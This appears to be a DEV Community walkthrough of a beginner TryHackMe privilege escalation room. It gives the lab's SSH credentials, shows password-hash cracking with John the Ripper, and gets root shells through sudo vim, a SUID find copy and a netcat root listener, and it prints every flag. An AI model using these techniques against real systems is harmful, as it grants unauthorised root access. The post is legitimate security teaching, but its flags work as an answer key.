DEV Community

Cover image for The Blackout Protocol β€” TryHackMe Room Writeup
Riviru Eren
Riviru Eren

Posted on

The Blackout Protocol β€” TryHackMe Room Writeup

#tryhackme #cybersecurity #ctf

The Blackout Protocol πŸ”’

"NovaCorp is hiding something. You've got one shot to get in, escalate, and expose them before they wipe everything at midnight."

This is a beginner-friendly Linux privilege escalation room I built on TryHackMe. It covers 5 real-world techniques that penetration testers use every day β€” SSH enumeration, password cracking, sudo misconfigurations, SUID binary abuse, and exploiting misconfigured services.

If you're just getting started with Linux privesc, this room is perfect for you.

Room link: https://tryhackme.com/room/theblackoutprotocol

🧰 What You'll Need

  • πŸ‰ A Kali Linux machine (or any Linux attacking machine)
  • πŸ–₯️ Basic familiarity with the Linux terminal
  • πŸ”¨ John the Ripper (pre-installed on Kali)
  • πŸ”Œ Netcat (pre-installed on Kali)
  • 🎯 A TryHackMe account with the room deployed

πŸ“– The Story

You're playing the role of a whistleblower's contact. A low-level employee at NovaCorp β€” a shady tech company β€” has given you their SSH credentials. They've told you there's evidence of illegal data stored on an internal server, but they don't have root access to find it.

Your job: get in as intern, escalate your way to root, find the evidence, and get out.

🚩 Task 1 β€” Getting In

What's happening here?

This task teaches you the basics of SSH access and Linux enumeration. When you first land on a machine as a low-privilege user, the first thing you should always do is look around β€” check what files are in your home directory, what groups you belong to, and what other users exist on the system.

πŸ‘£ Steps

  • Step 1 β€” Connect to the machine via SSH: 
ssh intern@MACHINE_IP
password: novacorp1
Enter fullscreen mode Exit fullscreen mode
  • Step 2 β€” Look around your home directory: 
ls -la
Enter fullscreen mode Exit fullscreen mode
  • Step 3 β€” Read the first flag: 
cat flag1.txt
Enter fullscreen mode Exit fullscreen mode
  • Step 4 β€” Check what other users exist: 
cat /etc/passwd | grep /bin/bash
Enter fullscreen mode Exit fullscreen mode

πŸ’‘ You'll also notice a file called employees.bak β€” keep that in mind for the next task!

βœ… Result

Flag 1: THM{w3lc0me_t0_n0v4c0rp}

🚩 Task 2 β€” Who Are You?

What's happening here?

The employees.bak file contains a Linux shadow hash β€” a hashed version of a user's password. In real penetration tests, finding backup files like this is extremely common. Sysadmins often leave password backups lying around without realising how dangerous they are. We'll crack it offline using John the Ripper.

πŸ‘£ Steps

  • Step 1 β€” Look at the backup file: 
cat employees.bak
Enter fullscreen mode Exit fullscreen mode

You'll see something like: sysadmin:$y$j9T$...:20585:0:99999:7:::

  • Step 2 β€” Copy it to your attacking machine: 
scp intern@MACHINE_IP:~/employees.bak .
Enter fullscreen mode Exit fullscreen mode
  • Step 3 β€” Crack the hash with John the Ripper: 
john --wordlist=/usr/share/wordlists/rockyou.txt employees.bak
Enter fullscreen mode Exit fullscreen mode
  • Step 4 β€” View the cracked password: 
john --show employees.bak
Enter fullscreen mode Exit fullscreen mode
  • Step 5 β€” SSH in as sysadmin: 
ssh sysadmin@MACHINE_IP
password: rockstar
Enter fullscreen mode Exit fullscreen mode

⚠️ Lesson learned: Never leave password hash backups in world-readable locations. Ever.

βœ… Result

Cracked password: rockstar

🚩 Task 3 β€” Sudo Slip-Up

What's happening here?

One of the most common privilege escalation vectors in real environments is sudo misconfiguration. Administrators sometimes grant users the ability to run specific programs as root β€” but if they're not careful, those programs can be exploited to spawn a root shell. We'll check sudo permissions and exploit vim using GTFObins.

πŸ‘£ Steps

  • Step 1 β€” Check sudo permissions as intern: 
sudo -l
Enter fullscreen mode Exit fullscreen mode

You'll see: (ALL) NOPASSWD: /usr/bin/vim

  • Step 2 β€” Exploit vim to get a root shell: 
sudo vim -c ':!/bin/bash'
Enter fullscreen mode Exit fullscreen mode
  • Step 3 β€” Verify you're root: 
whoami
Enter fullscreen mode Exit fullscreen mode
  • Step 4 β€” Read the flag: 
cat /var/log/novacorp/flag2.txt
Enter fullscreen mode Exit fullscreen mode

⚠️ Lesson learned: Never give users NOPASSWD sudo access to text editors, compilers, or interpreters. They can all spawn shells. Always check https://gtfobins.github.io for what can be exploited.

βœ… Result

Flag 2: THM{sud0_m1sc0nf1g_pwned}

🚩 Task 4 β€” Sticky Fingers

What's happening here?

SUID (Set User ID) is a Linux permission that allows a file to be executed with the permissions of its owner rather than the user running it. If a binary owned by root has the SUID bit set, running it gives you root-level execution β€” even as a normal user. This misconfiguration is surprisingly common in real environments.

πŸ‘£ Steps

  • Step 1 β€” Search the system for SUID binaries: 
find / -perm -4000 2>/dev/null
Enter fullscreen mode Exit fullscreen mode

You'll spot /usr/bin/find_bak β€” a copy of find with SUID set

  • Step 2 β€” Exploit it using GTFObins: 
/usr/bin/find_bak . -exec /bin/bash -p \; -quit
Enter fullscreen mode Exit fullscreen mode

The -p flag preserves the elevated privileges

  • Step 3 β€” Verify you're root: 
whoami
Enter fullscreen mode Exit fullscreen mode
  • Step 4 β€” Read the flag: 
cat /root/novacorp_secrets.txt
Enter fullscreen mode Exit fullscreen mode

⚠️ Lesson learned: Audit your SUID binaries regularly. No custom binary should ever have the SUID bit set unless absolutely necessary.

βœ… Result

Flag 3: THM{su1d_b1n4ry_expl01ted}

🚩 Task 5 β€” The Backdoor

What's happening here?

Sometimes during a penetration test you discover a service running on an unusual port. In this case NovaCorp's server has a misconfigured service running as root on port 4444 β€” essentially an open root shell that anyone can connect to. Always check what's listening internally, not just externally.

πŸ‘£ Steps

  • Step 1 β€” Check what ports are open internally: 
ss -tlnp
Enter fullscreen mode Exit fullscreen mode

You'll see: LISTEN 0.0.0.0:4444

  • Step 2 β€” Connect from your attacking machine: 
nc MACHINE_IP 4444
Enter fullscreen mode Exit fullscreen mode
  • Step 3 β€” You'll land in a root shell. Read the final flag: 
cat /root/final_evidence.txt
Enter fullscreen mode Exit fullscreen mode

⚠️ Lesson learned: Never run services as root unless absolutely necessary. Always firewall internal ports. A misconfigured service running as root is a complete system compromise.

βœ… Result

Flag 4: THM{r00t_sh3ll_0wned_n0v4c0rp}

πŸ“Š Summary

Task Technique Key Command Flag
Task 1 SSH enumeration ls -la THM{w3lc0me_t0_n0v4c0rp}
Task 2 Password cracking john --wordlist=rockyou.txt SSH as sysadmin
Task 3 Sudo misconfiguration sudo vim -c ':!/bin/bash' THM{sud0_m1sc0nf1g_pwned}
Task 4 SUID binary abuse find_bak . -exec /bin/bash -p THM{su1d_b1n4ry_expl01ted}
Task 5 Netcat backdoor nc MACHINE_IP 4444 THM{r00t_sh3ll_0wned_n0v4c0rp}

🧠 Key Takeaways

  • πŸ” Always enumerate thoroughly when you first land on a machine
  • πŸ“ Backup files left in readable locations can expose password hashes
  • βš™οΈ Check sudo permissions with sudo -l β€” misconfigurations are incredibly common
  • 🏴 SUID binaries can be abused to escalate privileges β€” always check with find / -perm -4000
  • πŸ”Œ Check open ports internally β€” not just externally β€” with ss -tlnp
  • πŸ“– GTFObins (https://gtfobins.github.io) is your best friend for privesc

Room created on TryHackMe β€” give it a try!
πŸ”— https://tryhackme.com/room/theblackoutprotocol

Top comments (0)